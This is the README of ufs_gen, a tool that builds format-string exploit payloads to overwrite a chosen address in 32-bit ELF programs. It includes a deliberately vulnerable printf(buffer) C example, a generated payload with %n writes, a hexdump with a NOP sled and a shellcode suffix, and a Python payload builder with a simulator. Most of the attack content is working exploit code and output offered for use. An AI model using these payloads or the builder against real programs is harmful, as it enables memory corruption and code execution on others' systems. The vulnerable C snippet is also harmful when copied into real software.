path: root/README
blob: d8d33589937a32eb299e75691d48f0f0d33eb2bd (plain)
ufs_gen
=======

This software generates a format-string payload that overwrites the contents of
an address of your choice with a value of your choice. It does so with four
positional "%N$n" conversions, one per target byte, each preceded by a "%x" of
the width needed to steer the low byte of printf's character count.

The syntax is quite simple. Three parameters are required for the program to
run correctly:

stackidx: the positional-argument number (the N in "%N$n") at which the first
dword of your buffer (the payload) shows up on the stack, i.e. how many dwords
up from the format function's first variadic argument the buffer begins. Find
it by feeding the target "%1$08x", "%2$08x", ... until the output shows the
start of your own buffer.

override: the address to overwrite. The four target bytes are written one at a
time, at this address and at the three following it.

with: the value to write at that address.

This software is intended to work with a 32-bit ELF built from code like the
following, where user input is copied into a stack buffer and then handed to
printf() as the format string. Note that a binary built with
-D_FORTIFY_SOURCE=2 makes glibc abort on "%n" in a writable format string, and
that PIE/ASLR changes the addresses you would target.

example:

#include <stdio.h>
#include <string.h>

/* Deliberately vulnerable: the attacker-controlled buffer is passed to
 * printf() as the format string, so "%x" and "%n" conversions inside the
 * payload read from and write through the stack. */
int function(const char *payload)
{
    char buffer[BUFSIZ];

    strncpy(buffer, payload, sizeof(buffer));
    buffer[sizeof(buffer) - 1] = '\0';

    printf(buffer);     /* format string under attacker control */

    return 0;
}

Support for ELF64 and other formats is intended but not written yet. Although
the option 'addrsize' can already be used to specify that an address is not
4 bytes long, there is very little chance that the result would work correctly.

Support for printf(payload) directly (i.e. without a temporary buffer) is
also planned.

The options --prefix and --suffix respectively prepend and append their
argument to the payload. Since a prefix sits in front of the address dwords,
stackidx has to be chosen with the prefix in place.

The option --sfxnops adds n NOP bytes (0x90) between the payload and the
suffix, so that the suffix is reached from anywhere inside the NOP run.

Example
=======

user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4
D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n

(The 0x11 byte of each little-endian address is not printable and is dropped
by the terminal; the hexdump below shows the complete 16-byte address block.
After those 16 bytes, 120 more characters give a count of 136 = 0x88, and each
further 239 characters advance the low byte of the count by -17, yielding 0x77,
0x66 and 0x55 in turn.)

user@localhost$ shellcode="$(perl -e 'print "\x68\x2f\x73\x68\xff\xfe\x44"')"
user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 --suffix "$shellcode"  --sfxnops 100 | hexdump -C
NOP bytes are at offset 52 (0x34)
suffix is at offset 152 (0x98)
00000000  44 33 22 11 45 33 22 11  46 33 22 11 47 33 22 11  |D3".E3".F3".G3".|
00000010  25 31 32 30 78 25 34 24  6e 25 32 33 39 78 25 35  |%120x%4$n%239x%5|
00000020  24 6e 25 32 33 39 78 25  36 24 6e 25 32 33 39 78  |$n%239x%6$n%239x|
00000030  25 37 24 6e 90 90 90 90  90 90 90 90 90 90 90 90  |%7$n............|
00000040  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000090  90 90 90 90 90 90 90 90  68 2f 73 68 ff fe 44     |........h/sh..D|
0000009f

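To show how the padding widths in the example above are derived, here is an
added example in Python that is not part of ufs_gen. It rebuilds the payload
from the same three parameters, then replays printf()'s "%x"/"%n" accounting
against a mock memory to check that the four single-byte writes really leave
0x55667788 at 0x11223344. The function names (build_payload, simulate_printf,
demo), the MIN_PAD guard, the handling of --prefix and the mock stack layout
are assumptions of this example, not documented behaviour of ufs_gen.

```python
"""Rebuild and sanity-check a ufs_gen-style format-string write payload.

Added illustration, not ufs_gen's own source.  build_payload(),
simulate_printf(), MIN_PAD and the mock stack layout are assumptions made here.
"""
import re
import struct

# The 7 bytes the README passes as --suffix (treated as opaque data here).
SHELLCODE = b"\x68\x2f\x73\x68\xff\xfe\x44"

# '%Nx' guarantees only a *minimum* width: a 32-bit value prints up to 8 hex
# digits, so for N < 8 the character count would become unpredictable.  Adding
# 256 keeps the low byte of the count unchanged (assumption of this example,
# not documented for ufs_gen itself).
MIN_PAD = 8


def build_payload(override, with_value, stackidx, prefix=b"", suffix=b"",
                  sfxnops=0):
    """Return (payload, nop_offset, suffix_offset) for one 4-byte overwrite.

    One %n write per target byte, aimed at override+i.  Each write stores the
    running character count, whose low byte is steered to the i-th byte of
    with_value.  The three high bytes spill over override+i+1..+3 and are
    fixed up by the next write (the last one leaves them behind, see demo()).
    Assumption: len(prefix) is a multiple of 4 and stackidx already points at
    the first address dword, so the prefix only adds to the character count.
    """
    body = b"".join(struct.pack("<I", override + i) for i in range(4))
    written = len(prefix) + len(body)
    for i in range(4):
        target = (with_value >> (8 * i)) & 0xFF
        pad = (target - written) % 256
        if pad < MIN_PAD:
            pad += 256
        body += b"%%%dx%%%d$n" % (pad, stackidx + i)
        written += pad
    nops = b"\x90" * sfxnops
    nop_off = len(prefix) + len(body)
    return prefix + body + nops + suffix, nop_off, nop_off + len(nops)


SPEC = re.compile(rb"%(\d+)\$n|%(\d+)x")


def simulate_printf(fmt, stackidx, memory, slot0_offset=0):
    """Replay printf(fmt) where fmt itself lies on the stack.

    Positional argument k is the dword at fmt[slot0_offset + 4*(k-stackidx)].
    '%Nx' is taken to emit exactly N characters (true for N >= 8 on a 32-bit
    target); '%k$n' stores the running count as a 4-byte little-endian int in
    the mock memory dict {address: byte}.  Returns the total character count.
    """
    count = pos = 0
    for m in SPEC.finditer(fmt):
        count += m.start() - pos            # literal bytes before this spec
        pos = m.end()
        if m.group(2) is not None:          # %Nx
            count += int(m.group(2))
        else:                               # %k$n
            off = slot0_offset + 4 * (int(m.group(1)) - stackidx)
            addr = struct.unpack("<I", fmt[off:off + 4])[0]
            for j, byte in enumerate(struct.pack("<I", count)):
                memory[addr + j] = byte
    return count + len(fmt) - pos           # trailing literal bytes (NOPs, suffix)


def read_dword(memory, addr):
    """Little-endian dword at addr in the mock memory (unwritten bytes are 0)."""
    return struct.unpack("<I", bytes(memory.get(addr + j, 0) for j in range(4)))[0]


def demo(override=0x11223344, with_value=0x55667788, stackidx=4):
    """Reproduce the README example and verify it against the mock memory."""
    payload, nop_off, sfx_off = build_payload(
        override, with_value, stackidx, suffix=SHELLCODE, sfxnops=100)
    memory = {}
    printed = simulate_printf(payload, stackidx, memory)
    return payload, nop_off, sfx_off, printed, read_dword(memory, override), memory


if __name__ == "__main__":
    payload, nop_off, sfx_off, printed, value, memory = demo()
    print("payload   :", payload[:nop_off])
    print("NOP bytes are at offset %d (0x%x)" % (nop_off, nop_off))
    print("suffix is at offset %d (0x%x)" % (sfx_off, sfx_off))
    print("printf() emitted %d characters" % printed)
    print("memory[0x11223344] = 0x%08x" % value)
    print("spill-over bytes  :", [memory[0x11223348 + j] for j in range(3)])
```

Running it reports the same offsets as the tool (NOPs at 52, suffix at 152) and
a final value of 0x55667788. Because each "%n" stores a full 4-byte int, the
last write also leaves 03 00 00 at override+4..+6; when those bytes matter, a
byte-exact variant would use "%hhn" instead. The simulation assumes the suffix
contains no '%' byte, which holds for the 7 bytes used in the README.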

License
=======

This software is free software covered by the GPL license v2. You should
read the COPYING file to understand what is implied.